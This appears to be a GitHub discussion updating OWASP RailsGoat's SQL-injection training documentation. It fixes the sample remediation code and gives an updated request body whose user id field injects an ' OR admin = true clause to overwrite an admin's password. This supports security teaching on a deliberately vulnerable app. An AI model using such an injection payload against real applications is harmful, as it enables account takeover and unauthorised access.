Update R5 SQLi Documentation

[nvisium-john-poulin]

The proposed solutions do not work, as they rely on the no-longer existing user_id parameter, throwing the following error:

Failure/Error: user = User.find(id: params[:user][:user_id])

ActiveRecord::RecordNotFound:
Couldn't find User with 'id'={:id=>nil}

Refactor these to be in the following syntax. Also note, we no longer need to specify the column name since we're searching on primary key :

user = User.find(params[:user][:id])
user = User.where("id = ?", params[:user][:id]).first

https://github.com/OWASP/railsgoat/wiki/R5-A1-SQL-Injection-Concatentation

[kwesthaus]

Additionally, the described request string for the attack no longer works (at least in the docker version, per my testing).
Original:

utf8=✓&_method=put&authenticity_token=GXhLKKhfBXdFx5i6iqHEd5E32Kebn1+G35eA87RW1tU=&user[user_id]=5') OR admin = 't' --'")&user[password]=testtest1&user[password_confirmation]=testtest1

Working:

utf8=%E2%9C%93&_method=patch&authenticity_token=Md7OJziBYGQQT4L8%2BtyKICEHvfdcQpc%2F5yRmn9SJm7%2FXHpaVk0sptL%2FcZ2aglQtcO2G2ilxyS6hysuMW7Bnr1Q%3D%3D&user%5Bid%5D=5' OR admin = true) --%20&user%5Bpassword%5D=testtest1&user%5Bpassword_confirmation%5D=testtest1

The URL encoding and put -> patch changes are insignificant but just how they showed up by default in my browser, and I left them so it looks more similar when future users go to change it. The real change is the SQL injection string for the [user_id], which changes the parenthesis position, changes the admin property from t to true, and gets rid of extra characters at the end (but leaves a space since mysql needs it).